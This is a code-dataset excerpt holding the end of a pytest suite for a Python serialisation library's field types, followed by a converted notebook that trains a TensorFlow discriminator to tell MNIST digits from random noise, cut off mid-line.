of with keys that aren't Strs should fail validation.\n with raises(ValidationError):\n field.validate({5: 'hello'})\n\n\nclass TestList:\n\n def test_serialize(self):\n # A field that must be a list of Stringifys.\n example = List(Stringify)\n\n # Validation only happens when this Field is part of a Model. So it\n # still passes any Iterable value through.\n for value in ((), [], {}):\n example.serialize(value) == value\n\n # Any value that is not an Iterable will raise a TypeError\n for value in (None, 20.0, object, type):\n with raises(TypeError):\n example.serialize(value)\n\n # Serialize calls the subfield serialize method.\n assert example.serialize([False, ['s'], {'a': 5}]) == ['False', \"['s']\", \"{'a': 5}\"]\n\n def test_deserialize(self):\n # A field that must be a list of Stringifys.\n example = List(Stringify)\n\n # Validation only happens when this Field is part of a Model. So it\n # still passes any Iterable value through.\n for value in ((), [], {}):\n example.deserialize(value) == value\n\n # Any value that is not an Iterable will raise a TypeError\n for value in (None, 20.0, object, type):\n with raises(TypeError):\n example.deserialize(value)\n\n # Deserialize calls the subfield deserialize method.\n assert example.deserialize(['False', \"['s']\", \"{'a': 5}\"]) == [False, ['s'], {'a': 5}]\n\n def test_validate(self):\n # A field that must be a list of Stringifys.\n example = List(Stringify)\n\n # A list of Stryfiable types will pass validation.\n example.validate([False, ['s'], {'a': 5}])\n\n # Any value that is not an Iterable will raise a ValidationError\n for value in (None, 20.0, object, type):\n with raises(ValidationError):\n example.validate(value)\n\n\nclass TestTuple:\n\n def test_serialize(self):\n # A field that is a tuple (bool, str, Stringify)\n example = Tuple(Bool, Str, Stringify)\n\n # Validation only happens when this Field is part of a Model. So it\n # still passes any Iterable value through as long as its the correct\n # length.\n for value in ((None, None, None), [None, None, None]):\n example.serialize(value) == value\n\n # Any value that is not an Iterable will raise a TypeError\n for value in (None, 20.0, object, type):\n with raises(TypeError):\n example.serialize(value)\n\n # Serialize calls the subfields serialize methods.\n assert example.serialize((True, 'test', {'a': 5})) == (True, 'test', \"{'a': 5}\")\n\n def test_deserialize(self):\n # A field that is a tuple (bool, str, Stringify)\n example = Tuple(Bool, Str, Stringify)\n\n # Validation only happens when this Field is part of a Model. So it\n # still passes any Iterable value through as long as its the correct\n # length.\n for value in ((None, None, 'None'), [None, None, 'None']):\n example.deserialize(value) == value\n\n # Any value that is not an Iterable will raise a TypeError\n for value in (None, 20.0, object, type):\n with raises(TypeError):\n example.deserialize(value)\n\n # Serialize calls the subfields deserialize methods.\n assert example.deserialize((True, 'test', \"{'a': 5}\")) == (True, 'test', {'a': 5})\n\n def test_validate(self):\n # A field that is a tuple (bool, str, Stringify)\n example = Tuple(Bool, Str, Stringify)\n\n # A list of a tuple that will pass validation.\n example.validate((True, 'test', None))\n\n # Any value that is not an Tuple will raise a ValidationError\n for value in (None, 20.0, [None, None, None], object, type, (None, None)):\n with raises(ValidationError):\n example.validate(value)\n\n # A tuple with the incorrect types should also fail with a\n # ValidationError\n with raises(ValidationError):\n example.validate((None, 'test', None))\n\n\nclass TestBool:\n\n def test___init__(self):\n field = Bool(rename='test', required=False, default=False)\n assert field.rename is 'test'\n assert field.required is False\n assert field.default is False\n assert field.validators == []\n\n def test_deserialize(self):\n field = Bool()\n assert field.deserialize(False) is False\n assert field.deserialize(True) is True\n\n def test_validate(self):\n field = Bool()\n field.validate(False)\n field.validate(True)\n\n with raises(ValidationError):\n field.validate('True')\n\n\nclass TestFloat:\n\n def test___init__(self):\n field = Float(rename='test', required=False, default=False)\n assert field.rename is 'test'\n assert field.required is False\n assert field.default is False\n assert field.validators == []\n\n def test_deserialize(self):\n field = Float()\n assert field.deserialize(0.5) == 0.5\n assert field.deserialize(-1000.0) == -1000.0\n\n def test_validate(self):\n field = Float()\n field.validate(-100.0)\n field.validate(0.0)\n field.validate(500.0)\n\n for value in (0, '-1000.0'):\n with raises(ValidationError):\n field.validate(value)\n\n\nclass TestInt:\n\n def test___init__(self):\n field = Int(rename='test', required=False, default=False)\n assert field.rename is 'test'\n assert field.required is False\n assert field.default is False\n assert field.validators == []\n\n def test_deserialize(self):\n field = Int()\n assert field.deserialize(0.5) == 0.5\n assert field.deserialize(-1000.0) == -1000.0\n\n def test_validate(self):\n field = Int()\n field.validate(-100)\n field.validate(0)\n field.validate(500)\n\n for value in (0.0, '500'):\n with raises(ValidationError):\n field.validate(value)\n\n\nclass TestStr:\n\n def test___init__(self):\n field = Str(rename='test', required=False, default=False)\n assert field.rename is 'test'\n assert field.required is False\n assert field.default is False\n assert field.validators == []\n\n def test_deserialize(self):\n field = Str()\n assert field.deserialize('a') == 'a'\n assert field.deserialize(' ') == ' '\n\n def test_validate(self):\n field = Str()\n field.validate('hello')\n field.validate('a')\n\n for value in (None, 5):\n with raises(ValidationError):\n field.validate(value)\n\n\nclass TestChoice:\n\n def test___init__(self):\n field = Choice(range(5), required=False, validators=[])\n assert field.choices == range(5)\n\n def test_validate(self):\n field = Choice(range(5))\n\n field.validate(0)\n field.validate(4)\n\n with raises(ValidationError):\n field.validate('test')\n\n\nclass TestDateTime:\n\n def test___init__(self):\n field = DateTime(format='%Y%m%d %H:%M:%S', required=False)\n assert field.required is False\n assert field.format == '%Y%m%d %H:%M:%S'\n\n def test_serialize(self):\n field = DateTime()\n assert field.serialize(datetime.datetime(2001, 9, 11, 12, 5, 48)) == '2001-09-11T12:05:48'\n\n field = DateTime(format='%Y%m%d %H:%M:%S')\n assert field.serialize(datetime.datetime(2001, 9, 11, 12, 5, 48)) == '20010911 12:05:48'\n\n def test_deserialize(self):\n field = DateTime()\n assert field.deserialize('2001-09-11T12:05:48') == datetime.datetime(2001, 9, 11, 12, 5, 48)\n\n field = DateTime(format='%Y%m%d %H:%M:%S')\n assert field.deserialize('20010911 12:05:48') == datetime.datetime(2001, 9, 11, 12, 5, 48)\n\n\nclass TestDate:\n\n def test_serialize(self):\n field = Date()\n assert field.serialize(datetime.date(2001, 9, 11)) == '2001-09-11'\n\n field = Date(format='%Y%m%d')\n assert field.serialize(datetime.date(2001, 9, 11)) == '20010911'\n\n def test_deserialize(self):\n field = Date()\n assert field.deserialize('2001-09-11') == datetime.date(2001, 9, 11)\n\n field = Date(format='%Y%m%d')\n assert field.deserialize('20010911') == datetime.date(2001, 9, 11)\n\n\nclass TestTime:\n\n def test_serialize(self):\n field = Time()\n assert field.serialize(datetime.time(12, 5, 48)) == '12:05:48'\n\n field = Time(format='%H%M%S')\n assert field.serialize(datetime.time(12, 5, 48)) == '120548'\n\n def test_deserialize(self):\n field = Time()\n assert field.deserialize('12:05:48') == datetime.time(12, 5, 48)\n\n field = Time(format='%H%M%S')\n assert field.deserialize('120548') == datetime.time(12, 5, 48)\n\n\nclass TestDomain:\n\n def test_validate(self):\n field = Domain()\n\n field.validate('www.google.com')\n\n with raises(ValidationError):\n field.validate('hello')\n\n\nclass TestEmail:\n\n def test_validate(self):\n field = Email()\n\n field.validate('someone@website.com')\n\n with raises(ValidationError):\n field.validate('derp')\n\n\nclass TestIpAddress:\n\n def test_validate(self):\n field = IpAddress()\n\n field.validate('10.0.0.1')\n field.validate('2001:db8:85a3:0:0:8a2e:370:7334')\n\n with raises(ValidationError):\n field.validate('10.0.0.256')\n\n\nclass TestIpv4Address:\n\n def test_validate(self):\n field = Ipv4Address()\n\n field.validate('10.0.0.1')\n\n with raises(ValidationError):\n field.validate('10.0.0.256')\n\n\nclass TestIpv6Address:\n\n def test_validate(self):\n field = Ipv6Address()\n\n field.validate('2001:db8:85a3:0:0:8a2e:370:7334')\n\n with raises(ValidationError):\n field.validate('2001:db8:85a3:0:0:8a2e:370:73345')\n\n\nclass TestMacAddress:\n\n def test_validate(self):\n field = MacAddress()\n\n field.validate('3a:00:40:82:ad:00')\n\n with raises(ValidationError):\n field.validate('3a:00:40:82:a:00')\n\n\nclass TestSlug:\n\n def test_validate(self):\n field = Slug()\n\n field.validate('a_b-10')\n\n with raises(ValidationError):\n field.validate('a!')\n\n\nclass TestUrl:\n\n def test_validate(self):\n field = Url()\n\n field.validate('http://www.google.com/search?q=test')\n\n with raises(ValidationError):\n field.validate('derp')\n\n\nclass TestUuid:\n\n def test___init__(self):\n field = Uuid(required=False, default=uuid.UUID('2d7026c8-cc58-11e8-bd7a-784f4386978e'))\n\n assert field.required is False\n assert field.default == uuid.UUID('2d7026c8-cc58-11e8-bd7a-784f4386978e')\n\n def test_serialize(self):\n field = Uuid()\n\n assert field.serialize(uuid.UUID('2d7026c8-cc58-11e8-bd7a-784f4386978e')) == \\\n '2d7026c8-cc58-11e8-bd7a-784f4386978e'\n\n def test_deserialize(self):\n field = Uuid()\n\n assert field.deserialize('2d7026c8-cc58-11e8-bd7a-784f4386978e') == \\\n uuid.UUID('2d7026c8-cc58-11e8-bd7a-784f4386978e')\n\n def test_validate(self):\n field = Uuid()\n\n field.validate(uuid.UUID('2d7026c8-cc58-11e8-bd7a-784f4386978e'))\n\n with raises(ValidationError):\n field.validate('2d7026c8-cc58-11e8-bd7a-784f4386978e')\n\n\ndef test__resolve_to_field_instance():\n # An instance of a field should work\n assert _resolve_to_field_instance(Field()) == Field()\n\n # A Field class should work\n assert _resolve_to_field_instance(Field) == Field()\n\n # A Model class should work\n class Example(Model):\n pass\n\n assert _resolve_to_field_instance(Example) == Nested(Example)\n\n # All the base types should resolve correctly\n assert _resolve_to_field_instance(bool) == Bool()\n assert _resolve_to_field_instance(dict) == Dict()\n assert _resolve_to_field_instance(float) == Float()\n assert _resolve_to_field_instance(int) == Int()\n assert _resolve_to_field_instance(list) == List()\n assert _resolve_to_field_instance(str) == Str()\n assert _resolve_to_field_instance(tuple) == Tuple()\n\n # A Model instance should not work\n with raises(TypeError):\n _resolve_to_field_instance(Example())\n\n with raises(TypeError):\n _resolve_to_field_instance(Example())\n\n\ndef test_create():\n # Create a Field with a new serialize and deserialize method.\n Reversed = create( # noqa: N806\n 'Example',\n base=Str,\n serializers=[lambda s: s[::-1]],\n deserializers=[lambda s: s[::-1]]\n )\n\n class Example(Model):\n a = Reversed()\n\n example = Example.from_dict({'a': 'test'})\n assert example.a == 'tset'\n assert example.to_dict() == {'a': 'test'}\n\n # Create a Field with a new validate method.\n def validate_is_not_derp(value):\n assert value != 'derp'\n\n class Example(Model):\n a = create('NotDerp', Str, validators=[validate_is_not_derp])()\n\n assert Example('notderp').a == 'notderp'\n\n with raises(ValidationError):\n Example('derp')\n\n assert issubclass(create('Example'), Field)\n", "sub_path": "tests/test_field.py", "file_name": "test_field.py", "file_ext": "py", "file_size_in_byte": 18929, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "serde.field.Field", "line_number": 16, "usage_type": "name"}, {"api_name": "serde.field.Field", "line_number": 28, "usage_type": "call"}, {"api_name": "serde.field.Field", "line_number": 37, "usage_type": "call"}, {"api_name": "serde.field.Field", "line_number": 41, "usage_type": "call"}, {"api_name": "serde.field.Field", "line_number": 48, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 50, "usage_type": "call"}, {"api_name": "serde.error.SerdeError", "line_number": 50, "usage_type": "argument"}, {"api_name": "serde.Model", "line_number": 51, "usage_type": "name"}, {"api_name": "serde.field.Field", "line_number": 56, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 58, "usage_type": "call"}, {"api_name": "serde.error.SerdeError", "line_number": 58, "usage_type": "argument"}, {"api_name": "serde.field.Field", "line_number": 62, "usage_type": "call"}, {"api_name": "serde.field.Field", "line_number": 69, "usage_type": "call"}, {"api_name": "serde.field.Field", "line_number": 76, "usage_type": "call"}, {"api_name": "serde.field.Instance", "line_number": 86, "usage_type": "call"}, {"api_name": "serde.field.Instance", "line_number": 92, "usage_type": "call"}, {"api_name": "serde.field.Instance", "line_number": 98, "usage_type": "call"}, {"api_name": "serde.field.Instance", "line_number": 106, "usage_type": "call"}, {"api_name": "serde.field.Instance", "line_number": 114, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 123, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 123, "usage_type": "argument"}, {"api_name": "serde.field.Dict", "line_number": 131, "usage_type": "call"}, {"api_name": "serde.field.Str", "line_number": 131, "usage_type": "argument"}, {"api_name": "collections.OrderedDict", "line_number": 135, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 141, "usage_type": "call"}, {"api_name": "serde.field.Dict", "line_number": 150, "usage_type": "call"}, {"api_name": "serde.field.Str", "line_number": 150, "usage_type": "argument"}, {"api_name": "collections.OrderedDict", "line_number": 154, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 160, "usage_type": "call"}, {"api_name": "serde.field.Dict", "line_number": 169, "usage_type": "call"}, {"api_name": "serde.field.Str", "line_number": 169, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 176, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 176, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 180, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 180, "usage_type": "argument"}, {"api_name": "serde.field.List", "line_number": 188, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 197, "usage_type": "call"}, {"api_name": "serde.field.List", "line_number": 205, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 214, "usage_type": "call"}, {"api_name": "serde.field.List", "line_number": 222, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 229, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 229, "usage_type": "argument"}, {"api_name": "serde.field.Tuple", "line_number": 237, "usage_type": "call"}, {"api_name": "serde.field.Bool", "line_number": 237, "usage_type": "argument"}, {"api_name": "serde.field.Str", "line_number": 237, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 247, "usage_type": "call"}, {"api_name": "serde.field.Tuple", "line_number": 255, "usage_type": "call"}, {"api_name": "serde.field.Bool", "line_number": 255, "usage_type": "argument"}, {"api_name": "serde.field.Str", "line_number": 255, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 265, "usage_type": "call"}, {"api_name": "serde.field.Tuple", "line_number": 273, "usage_type": "call"}, {"api_name": "serde.field.Bool", "line_number": 273, "usage_type": "argument"}, {"api_name": "serde.field.Str", "line_number": 273, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 280, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 280, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 285, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 285, "usage_type": "argument"}, {"api_name": "serde.field.Bool", "line_number": 292, "usage_type": "call"}, {"api_name": "serde.field.Bool", "line_number": 299, "usage_type": "call"}, {"api_name": "serde.field.Bool", "line_number": 304, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 308, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 308, "usage_type": "argument"}, {"api_name": "serde.field.Float", "line_number": 315, "usage_type": "call"}, {"api_name": "serde.field.Float", "line_number": 322, "usage_type": "call"}, {"api_name": "serde.field.Float", "line_number": 327, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 333, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 333, "usage_type": "argument"}, {"api_name": "serde.field.Int", "line_number": 340, "usage_type": "call"}, {"api_name": "serde.field.Int", "line_number": 347, "usage_type": "call"}, {"api_name": "serde.field.Int", "line_number": 352, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 358, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 358, "usage_type": "argument"}, {"api_name": "serde.field.Str", "line_number": 365, "usage_type": "call"}, {"api_name": "serde.field.Str", "line_number": 372, "usage_type": "call"}, {"api_name": "serde.field.Str", "line_number": 377, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 382, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 382, "usage_type": "argument"}, {"api_name": "serde.field.Choice", "line_number": 389, "usage_type": "call"}, {"api_name": "serde.field.Choice", "line_number": 393, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 398, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 398, "usage_type": "argument"}, {"api_name": "serde.field.DateTime", "line_number": 405, "usage_type": "call"}, {"api_name": "serde.field.DateTime", "line_number": 410, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 411, "usage_type": "call"}, {"api_name": "serde.field.DateTime", "line_number": 413, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 414, "usage_type": "call"}, {"api_name": "serde.field.DateTime", "line_number": 417, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 418, "usage_type": "call"}, {"api_name": "serde.field.DateTime", "line_number": 420, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 421, "usage_type": "call"}, {"api_name": "serde.field.Date", "line_number": 427, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 428, "usage_type": "call"}, {"api_name": "serde.field.Date", "line_number": 430, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 431, "usage_type": "call"}, {"api_name": "serde.field.Date", "line_number": 434, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 435, "usage_type": "call"}, {"api_name": "serde.field.Date", "line_number": 437, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 438, "usage_type": "call"}, {"api_name": "serde.field.Time", "line_number": 444, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 445, "usage_type": "call"}, {"api_name": "serde.field.Time", "line_number": 447, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 448, "usage_type": "call"}, {"api_name": "serde.field.Time", "line_number": 451, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 452, "usage_type": "call"}, {"api_name": "serde.field.Time", "line_number": 454, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 455, "usage_type": "call"}, {"api_name": "serde.field.Domain", "line_number": 461, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 465, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 465, "usage_type": "argument"}, {"api_name": "serde.field.Email", "line_number": 472, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 476, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 476, "usage_type": "argument"}, {"api_name": "serde.field.IpAddress", "line_number": 483, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 488, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 488, "usage_type": "argument"}, {"api_name": "serde.field.Ipv4Address", "line_number": 495, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 499, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 499, "usage_type": "argument"}, {"api_name": "serde.field.Ipv6Address", "line_number": 506, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 510, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 510, "usage_type": "argument"}, {"api_name": "serde.field.MacAddress", "line_number": 517, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 521, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 521, "usage_type": "argument"}, {"api_name": "serde.field.Slug", "line_number": 528, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 532, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 532, "usage_type": "argument"}, {"api_name": "serde.field.Url", "line_number": 539, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 543, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 543, "usage_type": "argument"}, {"api_name": "serde.field.Uuid", "line_number": 550, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 550, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 553, "usage_type": "call"}, {"api_name": "serde.field.Uuid", "line_number": 556, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 558, "usage_type": "call"}, {"api_name": "serde.field.Uuid", "line_number": 562, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 565, "usage_type": "call"}, {"api_name": "serde.field.Uuid", "line_number": 568, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 570, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 572, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 572, "usage_type": "argument"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 578, "usage_type": "call"}, {"api_name": "serde.field.Field", "line_number": 578, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 581, "usage_type": "call"}, {"api_name": "serde.field.Field", "line_number": 581, "usage_type": "argument"}, {"api_name": "serde.Model", "line_number": 584, "usage_type": "name"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 587, "usage_type": "call"}, {"api_name": "serde.field.Nested", "line_number": 587, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 590, "usage_type": "call"}, {"api_name": "serde.field.Bool", "line_number": 590, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 591, "usage_type": "call"}, {"api_name": "serde.field.Dict", "line_number": 591, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 592, "usage_type": "call"}, {"api_name": "serde.field.Float", "line_number": 592, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 593, "usage_type": "call"}, {"api_name": "serde.field.Int", "line_number": 593, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 594, "usage_type": "call"}, {"api_name": "serde.field.List", "line_number": 594, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 595, "usage_type": "call"}, {"api_name": "serde.field.Str", "line_number": 595, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 596, "usage_type": "call"}, {"api_name": "serde.field.Tuple", "line_number": 596, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 599, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 600, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 602, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 603, "usage_type": "call"}, {"api_name": "serde.field.create", "line_number": 608, "usage_type": "call"}, {"api_name": "serde.field.Str", "line_number": 610, "usage_type": "name"}, {"api_name": "serde.Model", "line_number": 615, "usage_type": "name"}, {"api_name": "serde.Model", "line_number": 626, "usage_type": "name"}, {"api_name": "serde.field.create", "line_number": 627, "usage_type": "call"}, {"api_name": "serde.field.Str", "line_number": 627, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 631, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 631, "usage_type": "argument"}, {"api_name": "serde.field.Field", "line_number": 634, "usage_type": "argument"}, {"api_name": "serde.field.create", "line_number": 634, "usage_type": "call"}]} +{"seq_id": "555228098", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom sklearn import preprocessing\nfrom random import shuffle\n\n\n# In[2]:\n\n\n(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()\n\n\n# In[3]:\n\n\n# plt.imshow(x_train[0], cmap=\"gray\")\nprint(\"Fish\")\n\n# In[4]:\n\n\ndef normalise_matrix(dataset):\n dataset = (dataset/255)*2 - 1\n return dataset\n\n\n# In[5]:\n\n\nx_train = normalise_matrix(x_train)\nx_test = normalise_matrix(x_test) \nplt.imshow(x_train[0], cmap=\"gray\")\n\n\n# In[6]:\n\n\ndef one_hot_encoder(labels):\n enc = preprocessing.OneHotEncoder(categories=\"auto\")\n enc.fit(labels.reshape(-1, 1))\n return enc.transform(labels.reshape(-1, 1)).toarray()\n\n\n# In[7]:\n\n\ny_train = one_hot_encoder(y_train)\ny_test = one_hot_encoder(y_test)\n\n\n# In[8]:\n\n\ny_train = np.zeros((60000, 2))\ny_train[:, 1] = 1\n\ny_test = np.zeros((10000, 2))\ny_test[:, 1] = 1\n\n\n# In[9]:\n\n\ny_train = y_train.reshape(60000, 1, 2)\ny_test = y_test.reshape(10000, 1, 2)\n\n\n# In[10]:\n\n\nx_test.shape\n\n\n# In[11]:\n\n\nfrom skimage.transform import resize\n\nx_train64 = x_train.tolist() \n\nprint(\"Training reshaping started\")\n\nfor i, image in enumerate(x_train):\n print(i)\n x_train64[i] = resize(image, (64, 64)).reshape(64, 64, 1)\n\n\nprint(\"Training reshaping ended\")\n\n# In[12]:\n\n\nnoise_train = np.random.rand(10000, 64, 64, 1) * 2 - 1\n\n\n# In[13]:\n\n\n\n\n# In[14]:\n\n\n# for ele in noise:\n# x_train64.append(ele)\n\n\n# In[15]:\n\n\n# len(x_train64)\n\n\n# In[16]:\n\n\nx_test64 = x_test.tolist() \n\nprint(\"Rshaoing x tst\")\n\nfor i, image in enumerate(x_test):\n print(i)\n x_test64[i] = resize(image, (64, 64)).reshape(64, 64,1)\n\n\n# In[17]:\n\n\nnoise_test = np.random.rand(5000, 64, 64, 1) * 2 - 1\n\n\n# In[18]:\n\n\n# noise_test = noise_test.tolist()\n\n\n# In[19]:\n\n\n# for ele in noise_test:\n# x_test64.append(ele)\n\n\n# In[20]:\n\n\n# len(x_test64)\n\n\n# In[21]:\n\nprint(\"Np_array\")\n\nx_train64 = np.asarray(x_train64)\nx_test64 = np.asarray(x_test64)\n\nprint(\"Appending noise matrix to dataset started\")\n\nx_train64 = np.append(x_train64, noise_train, axis=0)\nx_test64 = np.append(x_test64, noise_test, axis=0)\n\nprint(\"Appending noise matrix to dataset ended\")\n\n\n# In[24]:\n\n\ny_train_noise = np.zeros((10000, 2))\ny_train_noise[:, 0] = 1\n\ny_test_noise = np.zeros((5000, 2))\ny_test_noise[:, 0] = 1\n\n\n# In[25]:\n\n\ny_train_noise = y_train_noise.reshape(10000, 1, 2)\ny_test_noise = y_test_noise.reshape(5000, 1, 2)\n\n\n# In[26]:\n\n\ny_train = np.append(y_train, y_train_noise, axis=0)\ny_test = np.append(y_test, y_test_noise, axis=0)\n\n\nprint(\"eigenfish\")\n\n# In[27]:\n\n\nfrom tensorflow.contrib.layers import flatten\n\ndef DCGAN_discriminator(x):\n # Hyperparameters to be added\n mu = 0\n sigma = 0.1\n \n # Discriminator\n \n # Layer 1: Convolutional. (Random) Input = 64x64x1. Output = 32x32x128.\n conv1_w = tf.Variable(tf.truncated_normal(shape = [33, 33, 1, 128], mean = mu, stddev = sigma))\n conv1_b = tf.Variable(tf.zeros(128))\n conv1 = tf.nn.conv2d(x, conv1_w, strides = [1,1,1,1], padding = 'VALID') + conv1_b\n \n # Batch Normalisation\n conv1 = tf.layers.batch_normalization(conv1)\n \n # Activation layer\n conv1 = tf.nn.relu(conv1)\n \n # Layer 2: Convolutional. (Random) Input = 32x32x128. Output = 16x16x256.\n conv2_w = tf.Variable(tf.truncated_normal(shape = [17, 17, 128, 256], mean = mu, stddev = sigma))\n conv2_b = tf.Variable(tf.zeros(256))\n conv2 = tf.nn.conv2d(conv1, conv2_w, strides = [1,1,1,1], padding = 'VALID') + conv2_b\n \n # Batch Normalisation\n conv2 = tf.layers.batch_normalization(conv2)\n \n # Activation layer\n conv2 = tf.nn.relu(conv2)\n \n # Layer 3: Convolutional. (Random) Input = 16x16x256. Output = 8x8x512.\n conv3_w = tf.Variable(tf.truncated_normal(shape = [9, 9, 256, 512], mean = mu, stddev = sigma))\n conv3_b = tf.Variable(tf.zeros(512))\n conv3 = tf.nn.conv2d(conv2, conv3_w, strides = [1,1,1,1], padding = 'VALID') + conv3_b\n \n # Batch Normalisation\n conv3 = tf.layers.batch_normalization(conv3)\n \n # Activation layer\n conv3 = tf.nn.relu(conv3)\n\n # Layer 4: Convolutional. (Random) Input = 8x8x512. Output = 4x4x1024.\n conv4_w = tf.Variable(tf.truncated_normal(shape = [5, 5, 512, 1024], mean = mu, stddev = sigma))\n conv4_b = tf.Variable(tf.zeros(1024))\n conv4 = tf.nn.conv2d(conv3, conv4_w, strides = [1,1,1,1], padding = 'VALID') + conv4_b\n \n # Batch Normalisation\n conv4 = tf.layers.batch_normalization(conv4)\n \n # Activation layer\n conv4 = tf.nn.relu(conv4)\n \n conv4 = flatten(conv4)\n \n conv5_w = tf.Variable(tf.truncated_normal(shape = (16384, 2), mean = mu, stddev = sigma))\n conv5_b = tf.Variable(tf.zeros(2))\n logits = tf.matmul(conv4, conv5_w) + conv5_b\n \n# logits = flatten(conv5)\n out = tf.sigmoid(logits)\n \n return out, logits\n\n\n# In[28]:\n\n\nx = tf.placeholder(tf.float32, (None, 64, 64, 1))\ny = tf.placeholder(tf.int32, (None))\none_hot_y = tf.one_hot(y, 2)\n\n\n# In[29]:\n\n\nrate = 0.001\n\n_, logits = DCGAN_discriminator(x)\ncross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=one_hot_y, logits=logits) \nloss_operation = tf.reduce_mean(cross_entropy)\n#optimizer = tf.train.AdamOptimizer(learning_rate=rate)\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=rate)\ntraining_operation = optimizer.minimize(loss_operation)\n\n\n# In[30]:\n\n\npredictions_operation = tf.argmax(tf.nn.softmax(logits), 1)\ncorrect_prediction = tf.equal(predictions_operation, tf.argmax(y_train, 1))\naccuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nsaver = tf.train.Saver()\n\ndef evaluate(X_data, y_data):\n num_examples = len(X_data)\n total_accuracy = 0\n sess = tf.get_default_session()\n all_predictions = []\n for offset in range(0, num_examples, BATCH_SIZE):\n batch_x, batch_y = X_data[offset:offset+BATCH_SIZE], y_data[offset:offset+BATCH_SIZE]\n accuracy, predictions = sess.run([accuracy_operation, predictions_operation], feed_dict={x: 